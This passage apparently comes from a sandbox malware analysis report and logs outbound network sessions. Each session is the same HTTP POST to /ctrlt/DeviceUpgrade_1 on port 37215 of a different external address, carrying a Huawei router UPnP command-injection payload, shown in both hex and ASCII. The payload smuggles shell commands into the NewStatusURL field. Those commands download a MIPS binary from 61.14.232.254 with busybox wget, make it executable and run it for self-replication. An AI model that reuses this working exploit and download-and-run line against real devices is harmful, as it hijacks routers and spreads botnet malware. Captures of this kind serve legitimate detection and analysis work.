2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1928192.168.2.1336360197.122.17.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659946918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1929192.168.2.1343270157.11.108.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659955025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1930192.168.2.1357266197.209.187.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.660011053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1931192.168.2.134340841.74.242.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.660305977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1932192.168.2.135013441.107.78.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.660316944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1933192.168.2.1350448145.227.118.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.660377979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1934192.168.2.1346546157.218.10.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.660413027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1935192.168.2.1353484174.180.174.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.661000967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1936192.168.2.1360962197.160.28.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683545113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1937192.168.2.1350376197.237.128.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683578014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1938192.168.2.1344760148.212.90.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.683598995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
